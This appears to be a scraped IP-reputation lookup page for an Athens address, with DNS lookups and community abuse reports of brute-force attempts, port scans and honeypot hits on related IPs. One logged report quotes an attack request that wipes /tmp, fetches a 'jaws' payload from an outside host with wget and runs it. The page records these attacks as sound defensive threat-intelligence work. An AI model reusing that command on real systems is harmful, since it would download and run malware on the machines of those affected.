5.54.154.63 - IPInfo

Basic Info

City: Athens

Region: Attica

Country: Greece

Internet Service Provider: Vodafone-Panafon Hellenic Telecommunications Company SA

Hostname: unknown

Organization: unknown

Usage Type: unknown

Comments:

Make a comment on this IP

Type	Details	Datetime
attackbotsspam	Telnet Server BruteForce Attack	2019-11-06 20:34:49

Comments on same subnet:

IP	Type	Details	Datetime
5.54.154.18	attackspam	IP Ban Report : https://help-dysk.pl/wordpress-firewall-plugins/ip/5.54.154.18/ GR - 1H : (60) Protection Against DDoS WordPress plugin : "odzyskiwanie danych help-dysk" IP Address Ranges by Country : GR NAME ASN : ASN3329 IP : 5.54.154.18 CIDR : 5.54.128.0/19 PREFIX COUNT : 167 UNIQUE IP COUNT : 788480 ATTACKS DETECTED ASN3329 : 1H - 2 3H - 3 6H - 7 12H - 16 24H - 28 DateTime : 2019-10-27 21:29:22 INFO : Port Scan TELNET Detected and Blocked by ADMIN - data recovery	2019-10-28 04:59:31

Type

Details

Datetime

5.54.154.18

attackspam

IP Ban Report :  
 https://help-dysk.pl/wordpress-firewall-plugins/ip/5.54.154.18/ 
 
 GR - 1H : (60)  
 Protection Against DDoS WordPress plugin :  
 "odzyskiwanie danych help-dysk" 
 IP Address Ranges by Country : GR 
 NAME ASN : ASN3329 
 
 IP : 5.54.154.18 
 
 CIDR : 5.54.128.0/19 
 
 PREFIX COUNT : 167 
 
 UNIQUE IP COUNT : 788480 
 
 
 ATTACKS DETECTED ASN3329 :  
  1H - 2 
  3H - 3 
  6H - 7 
 12H - 16 
 24H - 28 
 
 DateTime : 2019-10-27 21:29:22 
 
 INFO : Port Scan TELNET Detected and Blocked by ADMIN  - data recovery

2019-10-28 04:59:31

Whois info:

Dig info:

; <<>> DiG 9.10.3-P4-Ubuntu <<>> 5.54.154.63
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NXDOMAIN, id: 14001
;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 1

;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 4096
;; QUESTION SECTION:
;5.54.154.63.			IN	A

;; AUTHORITY SECTION:
.			433	IN	SOA	a.root-servers.net. nstld.verisign-grs.com. 2019110600 1800 900 604800 86400

;; Query time: 120 msec
;; SERVER: 183.60.83.19#53(183.60.83.19)
;; WHEN: Wed Nov 06 20:34:45 CST 2019
;; MSG SIZE  rcvd: 115

Host info

63.154.54.5.in-addr.arpa domain name pointer ppp005054154063.access.hol.gr.

Nslookup info:

Server:		183.60.83.19
Address:	183.60.83.19#53

Non-authoritative answer:
63.154.54.5.in-addr.arpa	name = ppp005054154063.access.hol.gr.

Authoritative answers can be found from:

Related IP info:

Related comments:

IP	Type	Details	Datetime
187.190.18.199	attackspambots	Honeypot attack, port: 4567, PTR: fixed-187-190-18-199.totalplay.net.	2020-02-08 15:07:06
109.95.179.64	attackbots	SSH Bruteforce attempt	2020-02-08 15:11:40
139.155.33.169	attack	" "	2020-02-08 15:00:10
184.82.37.59	attackbotsspam	Honeypot attack, port: 445, PTR: 184-82-37-0.24.public.knkon-mser01.myaisfibre.com.	2020-02-08 15:34:19
92.59.136.208	attack	Honeypot attack, port: 445, PTR: PTR record not found	2020-02-08 15:00:35
122.51.47.246	attackbots	Feb 8 05:56:51 pornomens sshd\[30407\]: Invalid user gzn from 122.51.47.246 port 42036 Feb 8 05:56:51 pornomens sshd\[30407\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=122.51.47.246 Feb 8 05:56:53 pornomens sshd\[30407\]: Failed password for invalid user gzn from 122.51.47.246 port 42036 ssh2 ...	2020-02-08 15:18:43
83.143.148.11	attack	5x Failed Password	2020-02-08 15:35:01
94.191.93.34	attack	SSH Brute Force	2020-02-08 15:21:17
222.186.30.145	attackspambots	Feb 8 07:29:34 v22018076622670303 sshd\[13538\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=222.186.30.145 user=root Feb 8 07:29:37 v22018076622670303 sshd\[13538\]: Failed password for root from 222.186.30.145 port 24800 ssh2 Feb 8 07:29:39 v22018076622670303 sshd\[13538\]: Failed password for root from 222.186.30.145 port 24800 ssh2 ...	2020-02-08 15:04:09
110.185.44.122	attack	Honeypot attack, port: 445, PTR: PTR record not found	2020-02-08 15:35:52
61.219.82.140	attackspambots	Honeypot attack, port: 445, PTR: 61-219-82-140.HINET-IP.hinet.net.	2020-02-08 15:20:01
120.28.205.54	attackspam	Honeypot attack, port: 445, PTR: PTR record not found	2020-02-08 15:09:06
78.128.112.114	attack	ET CINS Active Threat Intelligence Poor Reputation IP group 72 - port: 632 proto: TCP cat: Misc Attack	2020-02-08 15:36:31
42.118.253.168	attackspambots	LAV,DEF GET /shell?cd+/tmp;rm+-rf+*;wget+http://scan.casualaffinity.net/jaws;sh+/tmp/jaws	2020-02-08 15:09:53
14.231.174.241	attack	Feb 8 08:00:26 sd-53420 sshd\[29884\]: Invalid user hpe from 14.231.174.241 Feb 8 08:00:26 sd-53420 sshd\[29884\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=14.231.174.241 Feb 8 08:00:28 sd-53420 sshd\[29884\]: Failed password for invalid user hpe from 14.231.174.241 port 47596 ssh2 Feb 8 08:04:38 sd-53420 sshd\[30341\]: Invalid user tor from 14.231.174.241 Feb 8 08:04:38 sd-53420 sshd\[30341\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=14.231.174.241 ...	2020-02-08 15:07:34

Recently Reported IPs

83.17.232.148	45.82.32.207	39.46.18.134	46.161.27.133
45.82.32.42	188.0.190.98	49.235.99.186	78.184.247.98
104.152.187.177	186.250.214.48	134.209.39.104	69.85.70.37
213.87.126.109	118.189.185.100	182.48.83.1	213.230.112.57
103.217.110.128	221.193.177.163	180.124.241.162	178.159.160.65